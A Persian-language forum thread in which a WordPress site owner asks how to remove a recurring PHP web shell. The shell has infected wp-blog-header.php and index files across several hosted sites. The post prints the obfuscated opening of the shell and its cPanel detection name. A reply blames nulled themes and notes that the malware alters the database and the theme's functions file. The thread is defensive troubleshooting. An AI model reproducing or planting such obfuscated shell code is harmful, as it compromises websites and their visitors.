سلام دوستان
بنده چندین سایت روی هاستم دارم
چند روزیه سایتم درگیر یه ویروس شده
تا حالا 5 بار فایلهای آلوده حذف کردم و فایل سالم جایگزین کردم
فرداش دوباره شل بازگشته به فایلها
دسترسی فایلهای آلوده هم 0444 گذاشتم
اما بازم به شل آلوده شدن
نمونه کد شل
<?php
//header('Content-Type:text/html; charset=utf-8');
$O_OOO_000_='J6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O00_O0OO__='exquisitely15357';
$OO00O__0_O=171;
$O0O_O0O_0_='D/B/C_E.jsp';
$OOO0__0O0_=908;
$OO_0O_00_O=1;
$O_OO00_0_O=array("chinar","inflorescence","archthief","acnida","begay","bhagavata","incompliancy","geomorphogenist","marrella","goosebill","anthoecology","apis","conjecturable","dulciana","factitively","charterage","incitation","extinguishable","lugubriousness","bootied","hypernormal","debby","featherleaf","adaize","parallelogrammical","protistological","gallicole");;
$O__0_OOO00='';
$O_0O00_OO_='T2';

که در فایل wp-blog-header.php
و فایل های ایندکس سایت های دیگه جا خوش میکنه
اینهم اسم ویروسی که آنتی ویروس سی پنل پیدا میکنه
{HEX}php.generic.malware.438.UNOFFICIAL

روشی برای حذف دائمی این شل لعنتی هست؟
وردپرس هم آپدیت کردم

دقیقا این را می شه پاک کرد
همه اینها یک جدول می سازند در پایگاه داده و بیشتر روی فایل فانکشن قالب هم تغییرات را اعمال می کنن
اون فایل و برخی فایل دیگر را هم ویروسی می کنند .
علت تمام این ویروسها در سرور ها و ناامنی این سرور ها همین قالب های 10 هزارتومنی نال است .
قبلا اینو کامل توضیح دادم
http://wpir.ir/post-%DA%A9%D8%AF-%D9%85%D8%AE%D8%B1%D8%A8-%D9%88%DB%8C%D8%B1%D9%88%D8%B3-%D8%AC%D8%AF%DB%8C%D8%AF-%D9%88%D8%B1%D8%AF%D9%BE%D8%B1%D8%B3--146?pid=254#pid254